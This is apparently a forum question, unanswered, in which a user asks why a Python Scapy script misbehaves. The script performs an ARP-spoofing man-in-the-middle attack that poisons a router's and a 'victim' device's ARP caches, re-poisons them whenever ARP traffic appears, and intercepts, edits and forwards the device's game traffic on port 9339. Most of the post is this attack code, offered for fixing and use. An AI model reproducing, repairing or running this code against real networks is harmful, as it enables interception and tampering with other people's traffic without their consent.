
Firstly, I would like to clarify 2 points:

  • I have hesitated between posting here or on Stack Overflow. I don't really understand whether it is my code or some kind of security on my router. So, if you think this question should not be posted here, feel free to flag it.
  • If you think I'm trying to violate something, hack, or whatever, I beg you not to report my question. If I wanted to, I would rather use one of the numerous clickbait pieces of software.

To achieve this, I'm using the well-known packet crafting library Scapy.

Firstly, I'm retrieving the MAC addresses of the router and the victim. Then I craft 2 ARP is-at packets, one for the router and one for the victim, to put my computer in the middle of them.

from scapy.all import Ether, ARP, srp, sendp, sniff  # Scapy layers and send/receive helpers used below

def main():
    print("\nIP address of your router/box :")
    ipserveur = raw_input()
    print("\nIP address of your device playing CC :")
    ipvictime = raw_input()
    # Resolve the router's MAC with a broadcast ARP who-has
    print("\nResolving mac address of your router/box...")
    arp = Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ipserveur)
    rep, nonrep = srp(arp, timeout=3, verbose=0)
    if(rep):
        macserveur = rep[0][1].hwsrc
        print("Router mac address is "+macserveur)
    else: print("Unable to resolve mac address of your router")
    # Same for the victim
    print("Resolving mac address of your device...")
    arp = Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ipvictime)
    rep, nonrep = srp(arp, timeout=3, verbose=0)
    if(rep):
        macvictime = rep[0][1].hwsrc
        print("Device mac address is "+macvictime)
    else: print("Unable to resolve mac address of your device")
    if('macserveur' in locals() and 'macvictime' in locals()):
        print("\nCompromising serveur arp cache")
        # Unicast is-at replies; hwsrc defaults to this host's MAC, so the router
        # learns "victim IP is at my MAC" and the victim learns "router IP is at my MAC"
        arpserveur = Ether(dst=macserveur)/ARP(op="is-at",psrc=ipvictime,hwdst=macserveur,pdst=ipserveur)
        arpvictime = Ether(dst=macvictime)/ARP(op="is-at",psrc=ipserveur,hwdst=macvictime,pdst=ipvictime)
        arpserveur.show()
        arpvictime.show()
        sendp(arpserveur, verbose=0)
        sendp(arpvictime, verbose=0)
        print("Serveur cache compromised")
        # Sniff one frame at a time and hand it to filtrer() for forwarding
        while True:
            pkt = sniff(count=1)
            pkt.show()
            filtrer(pkt, arpserveur, arpvictime)

    else:
        print("Fatal error, stopping...")

Once I achieve this, I sniff packets. If I sniff an ARP packet, I recompromise the ARP caches of both the server and the victim. If I sniff a packet that matches my filter, I edit it and send it on to the recipient. Otherwise, I just send it on to the recipient.

This should imitate the ip_forwarding feature, which is deactivated on my Debian computer, except that I can edit packets between the server and the victim.

from scapy.all import ARP, TCP, sendp  # Scapy layers and sendp() used below

def filtrer(pkt, arpserveur, arpvictime):
    if(ARP in pkt[0]):
        #if arp packet on the network, then compromise arp cache again
        print("Recompromising arp cache again")
        sendp(arpserveur, verbose=0)
        sendp(arpvictime, verbose=0)
    elif(TCP in pkt[0] and (pkt[0].dport==9339 or pkt[0].sport==9339)):
        #if port = 9339, detected connection to the game
        editCC(pkt)   # the packet-editing function of this post, not shown here
        #forward the edited packet
        sendp(pkt, verbose=0)
    else:
        #forward the packet
        print("Forwarding packet ")
        sendp(pkt, verbose=0)

So yeah, basically, what are the problems? I have many strange bugs.

  1. When I launch the attack, it sometimes works for a few seconds, but packets do not seem to be forwarded correctly because the victim doesn't have Internet anymore. That means either the request never reaches the router or the reply never gets back to the victim.
  2. Sometimes the attacker's ARP cache seems to be compromised too, or at least bugged. I have to run sudo arp to update the ARP cache because I can't send requests to any device/router on my network, as if I were banned.

I have a totally normal router, as I'm experiencing this at home. It isn't a secured network, so basically it should not be secure in any way. Feel free to ask for any details you need to clarify the situation!

Xavier59

0 Answers